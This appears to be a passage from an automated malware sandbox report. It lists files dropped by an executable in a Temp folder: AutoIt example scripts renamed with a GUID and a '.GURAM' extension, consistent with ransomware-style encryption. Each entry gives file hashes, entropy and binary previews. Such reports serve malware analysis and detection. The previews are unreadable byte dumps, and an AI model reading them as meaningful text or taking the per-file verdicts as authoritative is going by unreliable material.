                                                                                                                                                                                                                                                Preview:......y.T.$.C.5.o...Q..(> .9..+.BR$.}7.$F.s}...o..T..5...h..r_.~...q...-p...,.....YN.h..W.....m5G\....?2...2..o3..MXB.*hz....e.Y.........b..J..tr`......B..5t.....c.F.;N....Y..!......&..`9.6..UP..7.^A.$y.D.#.^.r.2...V.<.yd.4K....=s...6\{...,.C5r....SY.s...F.7..X...9.=....@.,..vyUu....4......a.&MzR.D.....n..Qv ..d..N...T3.....:...7.P......?.."C..%..u..eV...$..I@......L%sTcs.p....$..k.HMV'.T...#...E.....n......V...qf.>.K=o........ .w8X.f.......Z....QzI.>..............1.V..|".N#W..)@n...z.....^X,......~...K..EG...y..4G.......v.Bp.Z.z..].&y.W*.4@b?..L......].i.d.....8..Y...O...Ag(.......g....{.......cg*.p..m.<i.......C@...r+..e..W.e......x...7@8..J..2....6q.I..L@[...ZI-.%....|F..{L...d..e.o..7.K...*.r..*.aO..e.i...Q5.C..T.A..:R.(T....3.i;3.%!.R......fK...|.".l.L:.....[...-.[FF_....3..f.......-P...7.-B.gW.x%1.3..?.m{5..E.J.........T....<..bI[....P.g...{. ..W.#-....z6`....Xy:._.G....V.......d.V.T.5.M.o&...K...T."...&hM...g.].\..\-n.....F...*B...

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ClipBoard_GetPriorityFormat.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1440
                                                                                                                                                                                                                                                Entropy (8bit):7.846258196721319
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:0B5HFyLcfFopnkCGYqyYS7pNr6DOTGIBy/Ggcv3OQgjmJrc0YXUZtwsTh:6ILcf8KYqyYS7pNr6Z+y/zY3OQu4o0jx
                                                                                                                                                                                                                                                MD5:B439DD25AAF6DFE2577DABA2DB364992
                                                                                                                                                                                                                                                SHA1:523DB20ECEFE64FF75EC20B6D65CD86B86D85669
                                                                                                                                                                                                                                                SHA-256:60F9BA920C65C3A362282B76508906841BF415DA6D96ED3DA28DDA6F256C453F
                                                                                                                                                                                                                                                SHA-512:BF22481613F9EE328BB5232412B6F4BC006CCCEF8B05C5A7D9EF615DDD1464B443D5CA1CB7C2EAA375C631EA0C3AAC1EFF58D3BAF3E829DBC7947AB69C109D44
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:W5,.f.#.4$O.|...@~[L.c...5.......T.\..g.4.=4.=..*..p.S.._.Z.%.wvz.y.Bo.3p}<.x.Sg..o...."....8.R.....z0.$X9..}f .....'c......n..4..i7.....&....H..e].r...D.....J...k..$0.-8...;Y....*..4Z.....Gk.!.....G..'7c...../3..^..;Vz...OOSW.#.Q.......f.....uES.....&..k;u..{U.&[R....j..q..$....,V.&...7`.>........_...3..\<....W...B.. ...C.y%...y!$.d.v.d.oBM..V.g......m))...f.EF.*.$.N...i.........g.{..f.....g.$b.Y......&....r..(........>I:....m.v6.($N.>*..I}v.o/eaK..8.\..~.a.&.].....O.J.J5~.D..|.zk.v?6..P(..e....T....B.....A.Ko.9...t>...L....%...d...5..J...}.....`..q.....;.,.8..../2.f.r...f.).$1..JP........|...$.3.`3...#..]dpH...2:'=.kB ...e.Oh.%t}G......s....,."...z..k.U.P.}...j..6...Ypt.a.}......\k.c....^0..../...aa.|..s>:P8.j..C.Q..0..$W...8~.........G.9.3.,.o3"?.T5^#.q{.....*.}..'K+@50......>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ClipBoard_Open.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1767
                                                                                                                                                                                                                                                Entropy (8bit):7.885553214507059
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:1c4bdQOIlbtHv9svOzT2OLv4o0jZtwUYZ:1XbKOebtHv9svGRMleUY
                                                                                                                                                                                                                                                MD5:23F0DD7E11916E18F6A17D0308907A28
                                                                                                                                                                                                                                                SHA1:AA148CF5663C99A31D42E0BE74C54B11936B30FD
                                                                                                                                                                                                                                                SHA-256:01BFC906441CC25CE0B850CA59DC644552C0407CD23E831A258268E9911AB9C2
                                                                                                                                                                                                                                                SHA-512:8BA8B07DD76AC58234E2E4D14ED5B744AB1A0A2FAFA63C05F06DB828BAB32D51138725DC58D3A450E3F9380A1BE56FB6EA6740C5FE56520101D9FD13BE19C7D6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Pd...aS3..h.k..|.Z.F..M'.....FG1..wf.Sd....a.a.R.~|..<!g.........i@u.......!.$\."M.P.B..|...&<......_ wZ.S..V.4.=2.g.......7..l.e..t.W.O.YV.S=...<C..n..a.^O.cq..hj`w.n..'...S.E.I.\b.\.VU.p~.o...mVv....gk]_y..at..$..[..l.p..~.4BY..3......]W\...=?|..dx.*).9..=BSv%.GP.t-C.0...&......P.xM.H}.=_.O.vn...._...S.s...W..q.....:.S-..jk.^.g..#...VJ.(.:..?..lS....E.`....P02..(Y.q%.m}'.l....x^.fdx..0.h.U...JoB .J53.........`u.............R...W,.]k.|...CV...D..n~b.N.Kl....*._...'YT..P].#.....L..vu/..........Q][...v.y.......5I).j...MO......t.S...............z.Q.9\..+).....!..3r.....y...'.[..*g.Xn.U/2..t]_gj......6...n;$Y..V.@:.(..-`G..E...y..`../..u..M^.!../..V..L ...{.W.d..{..:.....>.4,.a.@..a.^..u..H..b.9mD.j....-.Xm...(..`.5n0..Kv=|x...Z.2U..<....M.%_8..~...#Q..p....&.:MHZ.U.U...'...E.....ziH..~.....b.zH...=..m'..K.w.-.....U~..T.>@-......K".../.......ri*......-l.".\.*`5..u......d...lD..W).......a....,kY..i....J...I%.B"..........g...{......`f..'.*..S7..|.K

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ClipBoard_RegisterFormat.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1491
                                                                                                                                                                                                                                                Entropy (8bit):7.853305877692898
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:32IfvlsZ7yX0QXJQXzh2NbDfXTWanT8ZUHnZPxuBnq76KDw4NjmJrc0YXUZtwsTe:mIfiJeeXzgNP7XnT8uZpKnJKws4o0jZo
                                                                                                                                                                                                                                                MD5:F2C626390637958945B03CCD06B650A0
                                                                                                                                                                                                                                                SHA1:5542C14102160806608CA20FDBC8B0A735155639
                                                                                                                                                                                                                                                SHA-256:016987CFD5E3AD9C5AA61851E52CDF6DBE936AA23E757BD79D3C4DBA86D8ACB1
                                                                                                                                                                                                                                                SHA-512:112110A486BF8F543EBB7A7C780E83435430DE2CF7B745C6D1FC437FCD3154C3B4C7ABCB1BDE0B6301BA474E4BACB66223FE8B2E16C9E3B200DBA6D1DFA42C99
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.?. .... .bZ{..B&,....9(6.C...u..?...@..AQ!..1.^.d....?..mw..Mw..p=......&..8..gj......q5oWv...(..`N.. ..1.^..,y........#.'.7.e..a...Y...]{&......%...-&.`.F.R(../{=.8..1.o;.8 .".......J.........my\.n.G.v.Tl...Z.x.N...j...!.:/..!..".@..E.../..v4..I..+/......F.q7b.;Y..2..zhy.u)|..b|r...%....?g.r.29.l.S...O.a......9..$b..Z.c..u.......y......O:|...q..{..>..hu..bxy.'.E../.,.%....4.L..~...%.7(/.tj...".N.\...]../lQ*...4Z.A........$.uU.z!-....X:.L..$*<.Wz*<....T..i..w..|..l=@ge.4.u...o..........m.#Ue..{.~.<.t....u9...%lt.X....A...g..O..-...Z9....w..}P....._.j7....8aa.[.C.p.L..c.{.dq.T..].q..i...*7..pVu.rC. .W....W~?.....$a..W.A..N.h. {.a......1.....Y...'.......]....3.....7^.R....G3.[...a..&..%...rH..]<5. .\.w.....&.4...@.*..c."..;....Jo.q.;...^..R.:d.F......m.G...d..s..Na....{.%.>>...c....9.>=..buO..o..j.NP...n..&4`..r.'X....#./....%..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)..

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ClipBoard_SetData.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1537
                                                                                                                                                                                                                                                Entropy (8bit):7.849420721172036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:HwUv2Bet66wrP//QBB+2AE9yqN2NkfP2JA7jmJrc0YXUZtwsTvB:Hws2BW6NrvroyqN2NbC/4o0jZtwS
                                                                                                                                                                                                                                                MD5:1B5D552AD8AE40EDCB0C6392C066E01B
                                                                                                                                                                                                                                                SHA1:07A8B8339FFDB2C8A76BC98B4B6488933648FE5F
                                                                                                                                                                                                                                                SHA-256:0DCBE40078964451C50D15FA457FC5D6A82E3E4224D38FB56F94C812245A4F9C
                                                                                                                                                                                                                                                SHA-512:B75AEE1E9395402129F3846F30BB4B18162859854971D61E0CFBEAF5FA007D7ADBA38DE04EE50C4C1E060454CEE728639B0FAF2E202DA0712E593F4D604E7C49
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:ek\P?....4X...MY...fp\.H.`2^..Z..s..}'Z../.JV{D.8E8.p/|j(.{.*`..a...l%.}....s...u:....(5..+...N..|._....KF....T.Yq.I....K...Wg.r.....*.s..TC$..?....rZ......f..F...^.L.M..I.`..A}..'.....'D7].4......NL^..~..).?..\.#.=..g.z..x@"h.a$...<Lw.~...../.kv.l:4Op...gMx.......:u...A..;_.G....6.z...VY.-N............wcm2_...{.x..%..~....?...,V.Q.9.{.}^!k...l.K..8ts...:.)...I.4..2\.j..p...tj.V.....eI&..Br...qyU.~......d..O.......O.....^@..EpE.=w]9.,#.v..54e&l..}i.^.C.+.x.../.%...hId.Q..I.%..[*....7..c^.].XI|.3E_.i...g.+.MS...=.<...x.....N.T~.S..t..Q.C.3..i-k.,H.T."...:..r..H.|v. .g......K8{Zv._u,.Qi................n..7W+.nv...GhT.q]..yH...J.d..m..3\kd..\....|1......+.`....{.....C...l{.....t..6.~...Ye!..6.......y.CJ.......R-f.K..t...5F...:.o..5FV.W......G.C'%i...{.C.....?..Q.}.\.p....n./|.|.2....v2\.!%...=B...@Q6...Z....nY....`$2....g..r.....[po9..u.:."....D.=P..Tp......3..JR..9.#)...n.. ..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ClipBoard_SetViewer.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2457
                                                                                                                                                                                                                                                Entropy (8bit):7.919201052603598
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:PpzIou5mOiyRvfau8yIsJ1T7UyuHBhhKOzKg+x4o0jZtwf:PpzW5pJhvT7UyWYg/lef
                                                                                                                                                                                                                                                MD5:38CD194958D79C57B299B801FBF219EA
                                                                                                                                                                                                                                                SHA1:026A118C20A50C5A0BC447257E1136C28374198F
                                                                                                                                                                                                                                                SHA-256:92F9FA9571993EC9B30965197048B17EB19B2FE68DAAEEFE7527F44E325D5511
                                                                                                                                                                                                                                                SHA-512:A932D7E391F60AD0A1E871B8129786F609339054842D9313BB9411763AA20EE0D29C31A039E706ACEB6677A5CA19ABA8CEC3582651F9B29F4344AA6230C0F9CA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:\?..V.....(.........".n......H..g!.&.Q/....O.8.T.2x.n...z.9g.o..3...3.S.....*..."......L....b....i#..X.?..A.=.....*.b]nL.[....S.V.<..y.[RG.E't.2.N....I.t..lc|?.F..g.X..,!..R'..AA.0G7Fp.(..f.z.......3}_a.O..h>\.l.w...~@A......'...Y..>./.~..^....s....F8.*...5E.&.......p..;Q.g.....H....>......k.rf..i..........y.....e_..f......*)..0.&d..h......$P....{...@D....RI.._...Og..q...3.U...&.L.....XZ....N........2.n...X.7.n=v..f2.*..[..P...7..E.0.........f._.E[..cS...E(`}h...:.O.x%......{X....V........?.D*..Y<aj;5...r...].....h.X+...6...B.`#.....*...X.9...S.b..l.D>\.xr.Vn.o\...U..: .?t.~+9e....i_.{....u7).O..M.W...p...b.ni{.....5...G..S...O..........RmvT..>-<Y.$!...|.&8.S...e.D.7<e........5=M.)....v-..!&b.....`.,....+....Y..........>....'.0/.....3~.....N2.&F.E..4.A\.....?.k.R.#....s...*m..7..l}vs.*.\@H.W.A......S8...k.x>.4)...!..n......#}...utx.. :f.be...K.^.t...{...<.{=%.....Cw.....z....m.DZ)yje?.Ul*.L1.`V/Uw0.......%..../Ax..r.s....;.t.

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ClipPutFile.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):999
                                                                                                                                                                                                                                                Entropy (8bit):7.7648837280612755
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:+NJxoGYKIibwG0S0uUgjmJrc0YXUZtwsT3Z:s57IibwC0Hu4o0jZtwoZ
                                                                                                                                                                                                                                                MD5:B0479A5653975CD693627CA9840A5684
                                                                                                                                                                                                                                                SHA1:32F765123E9AA27C42FA891485F9C4AF46CE342A
                                                                                                                                                                                                                                                SHA-256:6C49776D9300C46F9B928D8393186397B8A1A42D6AD8CA6128DB72835D0E1F0C
                                                                                                                                                                                                                                                SHA-512:CAFD079114ED991F2FC77FC2DBBB0ED22C4E198A2DC8E767B41C646BFBDF10755AF8030585B42ECD69EC1B96ED15DBFA1A0C35C89E4A4F9C834358BC2CEB49C6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..$..\6.jcv.....\/:..5....eXw?.s.X7..V;...&mArr..."5=._5..e...9l...4^..0P.b.....6.@..>._...k..g...\.....h.............q....Qu...HV.'.i.1O......:..1`....C.<..`..k.....J...lT.....c._..R..GE..s/....x4sr...%Z...:kl(.3.."...@.2. G.2...g=.-O0?9`.75c8..:.;./. r....xh./.^.k;.7xz;..|3c..=.Y"......hHg8..cH8q.~.......V..gK..u..!...r1.I..#.!..GS .[|..6%.0.v41..5V..^..~fX7.Xz. *........>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.R.}c.l^..g.....S..>kBM(...c.E.........................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ColorConvertHSLtoRGB.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1289
                                                                                                                                                                                                                                                Entropy (8bit):7.835958497660939
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:RdUNUPFjdxLkBu9vfLxweCst9kgjmJrc0YXUZtwsTO2a:RdnFjHko5WM994o0jZtwP2a
                                                                                                                                                                                                                                                MD5:7AE34E3220C44EC58FABED6337C39BE9
                                                                                                                                                                                                                                                SHA1:BAF529B8E30708C1EB5D7F8012F44228DC6118CD
                                                                                                                                                                                                                                                SHA-256:2D8E82F3A468489B71BF9811D5B06378F1AFA2280907275FF2661A3DA7AE66CF
                                                                                                                                                                                                                                                SHA-512:0F235CA9ABEE6F34C3AC13AC482C2FCE9DC62E64DC0FA12A53B77AB626F9AA881D6CFFA624510B5BF34BCCF5C3327261E31AE604765E237F38318E39AC201289
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:zY'........+=.Y...\.3.k...O5.D&.0)..0.u...1.N`..Y....@..?F..........b..7..B"......?...(..?{.v.29.4.K......=V...Ri5.......[...f.9e.{.....z.....a....>..75..w[.....6Q.#..\c.A`..Ov..Q=.0..^|/...$u...[....R......=.[......n`..$b2.M..n..0....3d\.M)..A....@...<t3.../.5...Q:F<6.p..~T..+...s+..,......`......qI..o...o...H..'{....<l.8TzD.z.....:.}..0..........iU...C.kBE.u!.....T83.Dg....r.^.&.b.....4..y....{..hP.n?.f..)+...>1tw|...$...U.R.;..(a..K...>.....9.z..9,JL^2...D....%..).......'..~.D..[<........^..H.E...R{.._.W.]. .&.Ze......<....}y.X...Q.&~Z..i.~.5.2d..\-.^b.'..7S.,L.l.1....{G.L..I0.i(...f~.0.H.I..x.._e..d]j8.2...`(]v<.}..C`.a..K...".....I..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ColorConvertRGBtoHSL.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1289
                                                                                                                                                                                                                                                Entropy (8bit):7.845099649165368
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:buFYJF3oEf28iprw2NEXq8yg3UmM+Spz6tjmJrc0YXUZtwsTp:iFUn8pXNEsDy4o0jZtwy
                                                                                                                                                                                                                                                MD5:520B3B8B947343D3BA5610EDCEC30F6E
                                                                                                                                                                                                                                                SHA1:D6207B002EF7E17014FEEF802FF43BD38FA533BA
                                                                                                                                                                                                                                                SHA-256:839623C9DCDB6CB2C0991D48C8C62D4A533BF3347B94A8EE317A2AC909E6E53E
                                                                                                                                                                                                                                                SHA-512:8CF2465CA8EA1B5B830FCA6D81C89CF712DD7907104E14FBC0C7BE25C94A69F0BEC055B16392F56DE80EB2C8DA520D7838E1B1BA84A034C125583BD6404EA02C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.....]..L...p...|.H{M.LC.....!T.8.tX#..A.5.g.{C....f_.../.....*#.Z8..U.Ki.D......n.t...-.p...W...=.X[...Z+.\.5"^.V.w.5B\..*.3...Z.H....).`x(.Vj7p..=.^..Q............ks..B..@(..........h....Q...q.s|.]q....~;/....V.. .2...Lc.u.P:..).L,o`.e.;..tn g<.kYY...,..v...;.........^6...b.Y.D3...1..F.Ll../...?#x.T..&....wD..ga.r^$+.....$s.u.._....!..h.h...K139.1.F.y|s.v..n.B'R..-...QX.AUe..o.^..6..4....m....~l...+..5.[..JT.....|...Hb...3..J..T....1R.....Z...7.A.!..!Zm`..o.I/%j.oP.+.=f.....Z.F%.....,^0S.,.S..U.....[/........BUB..-.|.CJ...']I..|.+.@....9..,...)...10"..h._{.DH...ZW...C".....)z..5_...)+j,...1.L.t......5....Bt..\....C(.U..'.>. ...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ColorGetBlue.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):757
                                                                                                                                                                                                                                                Entropy (8bit):7.717474518066009
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:qtEGQcgvE3LijDjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZo4ku:IQcgvMejmJrc0YXUZtwsTMo
                                                                                                                                                                                                                                                MD5:FE4C9EFA8F8F5AD189ADCBD4FAFAC015
                                                                                                                                                                                                                                                SHA1:CF80B249241949EC21BFE544318AEA6230C40D79
                                                                                                                                                                                                                                                SHA-256:9748A9691CE84709E7126D0AF950E800F66EA873E7FDD9043309C1AF0A772AE7
                                                                                                                                                                                                                                                SHA-512:2A8742CC1D447E02E0F2D650A7E93D76FDBF0106BEE1284C9AF5D87BFC05A24A383FF90DB4EE21D60C55D5481821C3D6D6BD8C4A31CAB3FA210E75E1A8CE77AB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..nB....(.2*......o... .....=..L...]Ei....&w.zdP&t.B....:2.ni..\....e..[......G<.{.....u.R6.^.%.(..V....c...fk.X.ED..?TN.(.V.[....@`S..4..@aH.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.qe.?.Z.t.....O.X...>.Lj!.{.`0.p.K.....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ColorGetCOLORREF.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):901
                                                                                                                                                                                                                                                Entropy (8bit):7.7360602279068695
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:LR1y9Hp6vOjTWJwfDo1gyjmJrc0YXUZtwsTmOfus:LRs9HAvOHa1g84o0jZtw6
                                                                                                                                                                                                                                                MD5:C90364D45DA2415D5E97EA61D35EAFD5
                                                                                                                                                                                                                                                SHA1:39D6C07CD1FE668AC34FE30DAB50CA41A14D2C7E
                                                                                                                                                                                                                                                SHA-256:BBE52A8C7755485BF89F6CDC1ADB3AB7DD0CE1C1B811BA1DE97BC515FFF8A8BD
                                                                                                                                                                                                                                                SHA-512:D470BF71CF3E6AF56107D53F386FCC2DA1DEF3D23C39371CAF219CCBE9EEA13F516CE9C78396B545775C18D14068FEFFFD4FD85590F2E1029118A4C55CE969CB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.......[....z.8.m).{.......+.s$,f..........*.......p.L.A....._/...H.u....# .......d.......k..E.l...}.6..a.J?$....Z....\.yk*.{.{....%.C..iI..<.A.Xw..7u.<n<.,o'....ho...t.\.&..7..HN.iy..s4......NE...Z....;....R\...Ah..td7d.8..2.....l....../V0....$..p&S...+.8...Bv.....+.O...M+.u....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..$r\.H.,..;O....h....|.v.IGY!..0.+.R%...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ColorGetGreen.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):760
                                                                                                                                                                                                                                                Entropy (8bit):7.7096091763179375
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:9GWcZocE3xEv8KjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZLaKSn:k9ZoV3iv8KjmJrc0YXUZtwsTvC
                                                                                                                                                                                                                                                MD5:91DEB4AFC7613C3B7F0CE4C6987E2AD6
                                                                                                                                                                                                                                                SHA1:AED8E3EA294BBBD5CD237337F5FC008B9043C40E
                                                                                                                                                                                                                                                SHA-256:7B6E9A7CB80F78D4BF2B7A1D6769A94EF319218DB0303B906DD2318C306968EA
                                                                                                                                                                                                                                                SHA-512:2EE542E52F2E3DB0BDBF5487430C1676F9FBF6916A537098798949692D3A1490FCD97BA65EC856017F89D052230FE311EC855432D3E055F0E2CAFF338D98B04C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
